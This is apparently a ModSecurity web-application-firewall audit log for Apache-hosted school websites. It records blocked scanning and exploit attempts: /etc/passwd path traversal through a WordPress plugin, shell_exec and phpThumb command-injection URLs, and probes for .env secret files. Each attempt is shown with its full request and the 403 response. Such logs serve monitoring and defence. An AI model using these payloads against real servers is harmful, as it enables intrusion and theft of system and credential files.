Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/html&mla_download_file=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424952159782 1604 (- - -)
Stopwatch2: 1745424952159782 1604; combined=448, p1=317, p2=110, p3=0, p4=0, p5=21, sr=51, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--a6ad954f-Z--
--ac81b245-A--
[23/Apr/2025:23:15:52 +0700] aAkSOBuwXEWV6ydgl52ZtQAAAAw 103.236.140.4 42418 103.236.140.4 8181
--ac81b245-B--
GET /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--ac81b245-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--ac81b245-E--
--ac81b245-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /nette.micro/?callback=shell_exec&cmd=cat%20/etc/passwd&what=-1"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424952959579 2339 (- - -)
Stopwatch2: 1745424952959579 2339; combined=721, p1=463, p2=221, p3=0, p4=0, p5=36, sr=120, sw=1, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--ac81b245-Z--
--75c18344-A--
[23/Apr/2025:23:15:53 +0700] aAkSOTI97BrbgvDq16Rt5gAAAMc 103.236.140.4 42440 103.236.140.4 8181
--75c18344-B--
GET /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--75c18344-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--75c18344-E--
--75c18344-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /plugins/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlaceline%20file.jpg%20jpeg:file.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424953560077 1795 (- - -)
Stopwatch2: 1745424953560077 1795; combined=521, p1=354, p2=143, p3=0, p4=0, p5=24, sr=62, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--75c18344-Z--
--3b669f36-A--
[23/Apr/2025:23:15:55 +0700] aAkSOz1ahuoJLEjKiAU18AAAAIY 103.236.140.4 42492 103.236.140.4 8181
--3b669f36-B--
GET /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--3b669f36-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--3b669f36-E--
--3b669f36-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /online-editor/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424955194439 1789 (- - -)
Stopwatch2: 1745424955194439 1789; combined=541, p1=387, p2=133, p3=0, p4=0, p5=21, sr=100, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--3b669f36-Z--
--91faaf77-A--
[23/Apr/2025:23:15:55 +0700] aAkSO9Iw_rqnm4P5_afPcQAAAE0 103.236.140.4 42494 103.236.140.4 8181
--91faaf77-B--
GET /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--91faaf77-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--91faaf77-E--
--91faaf77-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /assets/tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424955390332 12326 (- - -)
Stopwatch2: 1745424955390332 12326; combined=21763, p1=363, p2=136, p3=0, p4=0, p5=10647, sr=65, sw=0, l=0, gc=10617
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--91faaf77-Z--
--2db1386a-A--
[23/Apr/2025:23:15:55 +0700] aAkSOxuwXEWV6ydgl52ZuwAAAAg 103.236.140.4 42504 103.236.140.4 8181
--2db1386a-B--
GET /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--2db1386a-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--2db1386a-E--
--2db1386a-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tiny_mce/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424955619556 2147 (- - -)
Stopwatch2: 1745424955619556 2147; combined=621, p1=446, p2=146, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--2db1386a-Z--
--80b5541f-A--
[23/Apr/2025:23:15:55 +0700] aAkSOxuwXEWV6ydgl52ZvQAAABg 103.236.140.4 42510 103.236.140.4 8181
--80b5541f-B--
GET /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--80b5541f-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--80b5541f-E--
--80b5541f-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424955831684 2302 (- - -)
Stopwatch2: 1745424955831684 2302; combined=615, p1=420, p2=157, p3=0, p4=0, p5=38, sr=72, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--80b5541f-Z--
--746c8452-A--
[23/Apr/2025:23:15:56 +0700] aAkSPD1ahuoJLEjKiAU18QAAAJI 103.236.140.4 42512 103.236.140.4 8181
--746c8452-B--
GET /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--746c8452-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--746c8452-E--
--746c8452-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424956030475 1707 (- - -)
Stopwatch2: 1745424956030475 1707; combined=514, p1=352, p2=129, p3=0, p4=0, p5=33, sr=66, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--746c8452-Z--
--8ce3c57d-A--
[23/Apr/2025:23:15:56 +0700] aAkSPD1ahuoJLEjKiAU18gAAAI8 103.236.140.4 42514 103.236.140.4 8181
--8ce3c57d-B--
GET /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--8ce3c57d-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8ce3c57d-E--
--8ce3c57d-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424956224987 1397 (- - -)
Stopwatch2: 1745424956224987 1397; combined=490, p1=347, p2=117, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8ce3c57d-Z--
--723ed32e-A--
[23/Apr/2025:23:15:56 +0700] aAkSPBuwXEWV6ydgl52ZvgAAAAU 103.236.140.4 42516 103.236.140.4 8181
--723ed32e-B--
GET /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9 HTTP/1.0
Host: up.smkn22jakarta.sch.id
X-Real-IP: 143.198.141.243
X-Forwarded-Host: up.smkn22jakarta.sch.id
X-Forwarded-Server: up.smkn22jakarta.sch.id
X-Forwarded-For: 143.198.141.243
X-Forwarded-Proto: https
Connection: close
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
--723ed32e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--723ed32e-E--
--723ed32e-H--
Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||up.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /editor/plugins/ibrowser/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr%5B%5D=blur%7C9%20-quality%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg;cat%20/etc/passwd;&phpThumbDebug=9"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 2)
Stopwatch: 1745424956445907 1847 (- - -)
Stopwatch2: 1745424956445907 1847; combined=623, p1=437, p2=154, p3=0, p4=0, p5=32, sr=71, sw=0, l=0, gc=0
Response-Body-Transformed: Dechunked
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--723ed32e-Z--
--94a9662e-A--
[24/Apr/2025:00:43:55 +0700] aAkm2z1ahuoJLEjKiAVpigAAAIg 103.236.140.4 33752 103.236.140.4 8181
--94a9662e-B--
GET /.env HTTP/1.0
Host: www.smkn22-jkt.sch.id
X-Real-IP: 45.148.10.172
X-Forwarded-Host: www.smkn22-jkt.sch.id
X-Forwarded-Server: www.smkn22-jkt.sch.id
X-Forwarded-For: 45.148.10.172
X-Forwarded-Proto: https
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 9; ANE-LX1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
Accept-Charset: utf-8
--94a9662e-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--94a9662e-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745430235147236 818 (- - -)
Stopwatch2: 1745430235147236 818; combined=254, p1=225, p2=0, p3=0, p4=0, p5=29, sr=56, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--94a9662e-Z--
--623b9659-A--
[24/Apr/2025:01:17:48 +0700] aAkuzD1ahuoJLEjKiAV82gAAAJM 103.236.140.4 41936 103.236.140.4 8181
--623b9659-B--
GET /.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.210
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.210
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--623b9659-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--623b9659-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745432268638633 884 (- - -)
Stopwatch2: 1745432268638633 884; combined=399, p1=343, p2=0, p3=0, p4=0, p5=56, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--623b9659-Z--
--8777f25c-A--
[24/Apr/2025:01:17:48 +0700] aAkuzDI97BrbgvDq16S-uwAAAMg 103.236.140.4 41942 103.236.140.4 8181
--8777f25c-B--
GET /config/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.210
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.210
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--8777f25c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--8777f25c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745432268892084 785 (- - -)
Stopwatch2: 1745432268892084 785; combined=338, p1=297, p2=0, p3=0, p4=0, p5=40, sr=74, sw=1, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--8777f25c-Z--
--1696465c-A--
[24/Apr/2025:01:17:51 +0700] aAkuz9Iw_rqnm4P5_aciBQAAAFU 103.236.140.4 41956 103.236.140.4 8181
--1696465c-B--
GET /.env.production HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.210
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.210
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--1696465c-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--1696465c-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745432271885764 3732 (- - -)
Stopwatch2: 1745432271885764 3732; combined=503, p1=347, p2=0, p3=0, p4=0, p5=156, sr=76, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
Engine-Mode: "ENABLED"
--1696465c-Z--
--f82da129-A--
[24/Apr/2025:01:17:52 +0700] aAku0NIw_rqnm4P5_aciBgAAAEM 103.236.140.4 41958 103.236.140.4 8181
--f82da129-B--
GET /api/.env HTTP/1.0
Host: 103.236.140.4
X-Real-IP: 154.83.103.210
X-Forwarded-Host: 103.236.140.4
X-Forwarded-Server: 103.236.140.4
X-Forwarded-For: 154.83.103.210
X-Forwarded-Proto: http
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
--f82da129-F--
HTTP/1.1 403 Forbidden
Content-Length: 199
Connection: close
Content-Type: text/html; charset=iso-8859-1
--f82da129-H--
Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"]
Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s
Action: Intercepted (phase 1)
Stopwatch: 1745432272057016 773 (- - -)
Stopwatch2: 1745432272057016 773; combined=350, p1=318, p2=0, p3=0, p4=0, p5=32, sr=60, sw=0, l=0, gc=0
Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache.
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
